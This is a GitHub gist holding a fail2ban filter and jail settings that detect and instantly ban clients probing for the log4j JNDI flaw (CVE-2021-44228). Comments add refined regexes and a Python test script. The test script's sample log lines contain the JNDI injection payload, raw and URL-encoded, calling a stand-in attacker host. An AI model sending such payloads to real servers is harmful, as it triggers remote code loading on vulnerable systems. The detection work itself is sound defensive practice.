Last active February 2, 2022 12:04
fail2ban filter rule for the log4j CVE-2021-44228 exploit
# log4j jndi exploit CVE-2021-44228 filter
# Save this file as /etc/fail2ban/filter.d/log4j-jndi.conf
# then copy and uncomment the [log4j-jndi] section
# to /etc/fail2ban/jail.local
#
# jay@gooby.org
# https://jay.gooby.org/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228
# https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949
# Thanks to https://gist.github.com/kocour for a better regex
#
# Bad actors trying to exploit log4j - instaban them with
# this in your /etc/fail2ban/jail.local
#
# We're using maxretry = 1
# because we know that they're a bad actor...
#
# [log4j-jndi]
# maxretry = 1
# enabled = true
# port = 80,443
# logpath = /path/to/your/*access.log
[Definition]
failregex = (?i)^<HOST> .* ".*\$.*(7B|\{).*(lower:)?.*j.*n.*d.*i.*:.*".*?$
I debugged my jail.local and the problem is log4j
Just collating in a single comment the changes I chose/had to make to get this working for me, mostly from the comments above.
# log4j jndi exploit CVE-2021-44228 filter
# Save this file as /etc/fail2ban/filter.d/log4j-jndi.conf
# then copy and uncomment the [log4j-jndi] section
# to /etc/fail2ban/jail.local
#
# jay@gooby.org
# https://jay.gooby.org/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228
# https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949
# Thanks to https://gist.github.com/kocour for a better regex
#
# Bad actors trying to exploit log4j - instaban them with
# this in your /etc/fail2ban/jail.local
#
# We're using maxretry = 1
# because we know that they're a bad actor...
#
# [log4j-jndi]
# maxretry = 1
# filter = log4j-jndi
# action = your_actions_here
# enabled = true
# port = 80,443
# logpath = /path/to/your/*access.log
[Definition]
failregex = (?i)^<HOST> .* ".*(\$|%%24).*(\{|%%7B).*(lower:)?.*j.*n.*d.*i.*(:|%%3A).*".*?$
ignoreregex =
I chose to use the regex suggested by @ursut. Thanks for sharing this @jaygooby!
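To see what the two failregex variants actually catch before pointing fail2ban at production logs, the following added example (not code from the gist, its author, or the commenters) runs the gist's original failregex and the updated one from the comment above over a handful of constructed access-log lines. fail2ban is itself written in Python and its failregex is a Python pattern, so the only translation needed is undoing the config-file escaping: `%%` becomes `%`, and `<HOST>` is replaced with a named group. The `(?P<host>\S+)` substitution for `<HOST>` is a simplification of fail2ban's real expansion and is an assumption of this example, as are the sample log lines and the addresses in them.

```python
import re

# Both failregex lines are copied from this page. fail2ban config files double
# '%' for interpolation, so '%%24' in the file is '%24' in the live regex.
ORIGINAL_FAILREGEX = r'(?i)^<HOST> .* ".*\$.*(7B|\{).*(lower:)?.*j.*n.*d.*i.*:.*".*?$'
UPDATED_FAILREGEX = r'(?i)^<HOST> .* ".*(\$|%%24).*(\{|%%7B).*(lower:)?.*j.*n.*d.*i.*(:|%%3A).*".*?$'


def compile_failregex(failregex: str) -> re.Pattern:
    """Turn a fail2ban failregex into a plain Python pattern.

    Assumption: '<HOST>' becomes a simple non-space named group. fail2ban's own
    expansion is more elaborate (IPv6, hostnames), but this is enough to test
    ordinary Apache/nginx access-log lines offline.
    """
    pattern = failregex.replace("%%", "%").replace("<HOST>", r"(?P<host>\S+)")
    return re.compile(pattern)


def matching_hosts(failregex: str, log_lines):
    """Return the client addresses the filter would count as failures, in order."""
    rx = compile_failregex(failregex)
    hosts = []
    for line in log_lines:
        m = rx.search(line)
        if m:
            hosts.append(m.group("host"))
    return hosts


# Constructed sample log lines (combined log format). Addresses are from the
# RFC 5737 documentation ranges and '.invalid' is a reserved TLD.
SAMPLE_ACCESS_LOG = [
    # raw JNDI lookup string in the query: both regexes should flag this
    '192.0.2.10 - - [13/Dec/2021:10:00:00 +0000] "GET /?x=${jndi:ldap://attacker.invalid/a} HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    # the same lookup fully URL-encoded: only the updated regex sees it,
    # because the original still requires a literal '$'
    '192.0.2.11 - - [13/Dec/2021:10:00:01 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
    # ordinary request: neither regex should flag it
    '198.51.100.7 - - [13/Dec/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    # benign request that nevertheless satisfies '$', '{', then j..n..d..i..':'
    # (the loose j.*n.*d.*i part); with maxretry = 1 this client gets banned
    '198.51.100.8 - - [13/Dec/2021:10:00:03 +0000] "GET /search?q=${price}&sort=john+dining:asc HTTP/1.1" 200 50 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for label, rx in (("original", ORIGINAL_FAILREGEX), ("updated", UPDATED_FAILREGEX)):
        print(f"{label}: {matching_hosts(rx, SAMPLE_ACCESS_LOG)}")
```

The run shows the updated regex picking up the URL-encoded probe that the original misses, but it also shows the last line: the `j.*n.*d.*i` sequence is loose enough that an unrelated request containing `$`, `{` and those four letters in order, followed by a colon, is flagged by both variants. Since the jail uses `maxretry = 1`, it is worth running `fail2ban-regex /path/to/your/access.log /etc/fail2ban/filter.d/log4j-jndi.conf` against a day of real traffic and checking the matched lines before enabling it.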
I found the problem: there is no backend. Your jail says it doesn't find the logs, so I point to the logs but need to put a backend.
[log4j-jndi]
maxretry = 1
enabled = true
filter = log4j-jndi
port = 80,443
logpath = /var/log/httpd/*access.log
backend = %(syslog_backend)s
# Ban IP and report to AbuseIPDB for LOG4J
action = %(action_)s
%(action_abuseipdb)s[abuseipdb_category="3,4,6,15,18,20,22"]
Do we need to extend the regex pattern for the next CVE? CVE-2021-45105
https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html
Any ideas?